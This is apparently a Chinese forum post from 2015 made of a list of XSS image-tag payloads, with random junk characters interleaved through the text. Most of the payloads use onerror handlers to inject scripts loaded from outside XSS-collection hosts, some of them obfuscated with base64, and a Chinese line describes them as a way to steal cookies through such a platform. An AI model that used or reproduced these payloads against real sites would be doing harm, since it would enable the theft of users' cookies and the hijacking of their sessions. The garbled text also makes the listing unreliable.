<img src='non-exist.jpg'onerror="alert('xss')">; Y b1 {4 v4 T4 B! F- R
<img src=# onerror=alert(123)>! a# q- [# |! x1 n$ u6 d: R. u2 q
<img src=# onerror=alert(document.cookie)>
& q8 Q3 X% H4 O* Z下面是利用平台钓cookie的
6 {- q. z6 _& L- m6 F <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
% |- f# ^; t% b0 a: b9 l2 ]1 K u0 A Q" H- c' h. z! g
" |& X% e, z$ G7 D<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>& `. j8 ^; m7 R3 N8 d! X$ m) D
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>; l5 b% C2 z6 J$ |0 O
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
* K2 _+ g! B2 }3 P# E& ?0 Y<img src=1 onerror=jQuery.getScript("//xss.re/974")>
9 `" ]2 I% n5 \<img src="#">
; L5 b5 D, P) q( T. Y, B* N<img src="#">/ i# G" W! G9 {% z5 w0 X9 u
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>) k3 B8 n8 N# j
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
( s' i8 l, m8 G: Y1 R c<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>5 i- i* m# }% N7 s: E6 m
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>. ~) u% V" ^5 Q! h
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
' p2 P% g6 {6 i<img src=x width="0" height="0"></img>
# O8 Z, N* w% ?<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>% b5 R% c: s3 I5 I7 b
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
8 @) P* w) B Y, B! s |
发表于 2015-10-18 14:33:54
收藏
支持
反对